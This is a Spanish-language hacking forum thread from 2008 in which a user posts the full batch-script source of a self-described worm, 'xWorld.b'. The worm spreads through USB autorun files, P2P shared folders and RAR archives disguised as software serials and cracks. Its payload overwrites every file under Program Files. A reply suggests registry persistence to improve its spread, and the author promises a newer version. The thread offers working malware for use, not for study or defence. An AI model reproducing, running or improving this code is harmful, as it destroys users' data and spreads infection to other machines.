Vota por nosotros en el ranking web que participamos

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Octubre 12, 2008, 10:07:05
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Programacion  |  Programación  |  Batch (Moderadores: Espectro Infernal, |Shadow|)  |  Tema: [virus] xWorld.b 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: [virus] xWorld.b  (Leído 153 veces)
|Shadow|
Dein Nulls
Moderadores
Colaborador
*****
Conectado Conectado

Mensajes: 910


Fucking mnemonic c0d1n6!

shadow@el-hacker.org
Ver Perfil WWW Email
« en: Junio 29, 2008, 11:49:30 »
Código:
:: Nombre: xWorld.b
:: Codeado por: Shadow; tshadow; The Shadow
:: Fecha: 14/04/08
:: Info: Worm de propagacion por USB, P2P y .rar . . .
:: Payload: El payload es aleatorio y al ejecutarse daña todos los archivos
::   del directorio ^%programfiles^%
 @echo off
goto %1_
:_
set a="%temp%\xw.bat"
echo set shell = CreateObject("wscript.shell") > "%temp%\xwr.vbs"
echo shell.run "cmd /c %a% xc", vbHide >> "%temp%\xwr.vbs"
copy %0 %a%>nul
start "%temp%\xwr.vbs"

:xc_
for %%v IN (D F G H I J K L M N O P Q R S T U V W X Y Z) do call :cmp %%v
call :p2p
if /I %random:~1,1% lss 5 goto wrm
exit

:cmp
if exist "%1:" (
copy %a% "%1:\xw.bat">nul
echo [autorun] > "%1:\autorun.inf"
echo open=xw.bat >> "%1:\autorun.inf"
echo shellexecute=xw.bat >> "%1:\autorun.inf"
echo shellexecute=xw.bat >> "%1:\autorun.inf"
echo shell\explorar\command=xw.bat >> "%1:\autorun.inf"
echo shell\explorar=^&Explorar >> "%1:\autorun.inf"
)
goto :EOF

:wrm

cd "%programfiles%"
dir /B > %homedrive%\dir.txt
goto for

:worm
set target=%1
cd "%target%"
for %%e in (*.*) do echo xWorld by Shadow>%%e
cd "%programfiles%"
goto :EOF

:for
for /f "tokens=* " %%a in (%homedrive%\dir.txt) do call :worm "%%a"
exit

:p2p
set a="%temp%\xw.bat"
if exist %windir%\t.rar (del %windir%\t.rar)
type %0>op.bat
set o="%systemdrive%%~p0op.bat"
cd "%systemdrive%%~p0"
echo eMule\Incoming\ > %windir%\yer.t
echo Shareaza\Downloads\ >> %windir%\yer.t
echo BearShare\Shared\ >> %windir%\yer.t
echo EDONKEY2000\incoming\ >> %windir%\yer.t
echo LimeWire\Shared\ >> %windir%\yer.t
echo Path_msn_Emoticonos > %windir%\jer.t
echo sms_gratis >> %windir%\jer.t
echo polifonicos_free >> %windir%\jer.t
echo Microsoft_Office_2007_all_serials >> %windir%\jer.t
echo Windows_Vista_activation_tool >> %windir%\jer.t
echo Windows_Vista_all_serials >> %windir%\jer.t
echo MSN_hack_codes >> %windir%\jer.t
set rc=1
set r="%programfiles%\WINRAR\WinRAR.exe"
%r% a %windir%\t.rar %o%
if not %errorlevel%==9009 set rc=0
goto fr
:fr2
set uno=%1
for /F "tokens=* delims=" %%g in (%windir%\jer.t) do (
         if %rc%==0 (
             @copy /y %o% "%%g.bat"
           cls
           ping -n 2 localhost > nul
           %r% a "%%g.rar" "%%g.bat"
         )
)
goto :EOF                                 
:fr
for /F "tokens=* delims=" %%a in (%windir%\yer.t) do (
         if exist "%programfiles%\%%a" (
            cd "%programfiles%\%%a"     
            for %%e in (*.rar) do (
                @copy /y %o% "%%~ne.bat"
              cls
              ping -n 2 localhost > nul
              %r% a "%%e" "%%~ne.bat"
            )     
         call :fr2 %%a
          )
)
pause
cd %windir%
del *.t
cd "%systemdrive%%~p0"
del op.bat
goto :EOF

Saludos!
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion





Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Reglamento del Foro
     Linux  Registered User #473016
ECDundy
Habitual
*****
Desconectado Desconectado

Mensajes: 211


throw new exception(":)");

erick_cartman_ok
Ver Perfil WWW Email
« Respuesta #1 en: Junio 29, 2008, 02:04:46 »
Bien codeado. Pero si el usuario no tiene acceso a ciertas carpetas debido a que no es un usuario administrador. Crees que continuara su propagacion al produccirse un error de nivel de acceso.
Hay que pensar un poco mejor el codigo. Un usuario con todas las restricciones. No tendria acceso a program files ni mucho menos a los archivos del sistema. Luego el unico lugar al que por defecto todos los usuarios tienen acceso es a
%USERPROFILE%. Entonces esta muy bien el hecho de que juegas con todo el codigo sin usar el registro.
Pero podrias provar el nivel de acceso al registro y luego anadir para que se autoejecute. Debido a que tambien exiten maquinas en las que el usuario no tiene acceso a los discos de almacenamiento pero si al registro. Como parte de el hecho de ejecutar programas. Esto se ve mucho en redes de programadores.
Espero te sea constructivo, felicidades entonces.
En línea
|Shadow|
Dein Nulls
Moderadores
Colaborador
*****
Conectado Conectado

Mensajes: 910


Fucking mnemonic c0d1n6!

shadow@el-hacker.org
Ver Perfil WWW Email
« Respuesta #2 en: Junio 29, 2008, 02:11:32 »
Precisamente para eso esta pensado el virus . . .

Por que crees que las operaciones vitales las maneja en %temp% . . .??

Obviamente sin permisos, la propagacion no se puede llevar a cabo . . . pero al momento en que lo cree el hecho de que tenga la debilidad de depender de los permisos de admins y que solo queria que se ejecutara una sola vez . . . paso por mi mente . . . x eso en la siguiente version "xWorld.c" . . . han cambiado muchas cosas . . . ya por ahy la posteare!.. .

Saludos! y gracias por el comentario!
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion





Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Reglamento del Foro
     Linux  Registered User #473016
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Programacion  |  Programación  |  Batch (Moderadores: Espectro Infernal, |Shadow|)  |  Tema: [virus] xWorld.b « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.6 | SMF © 2006-2007, Simple Machines LLC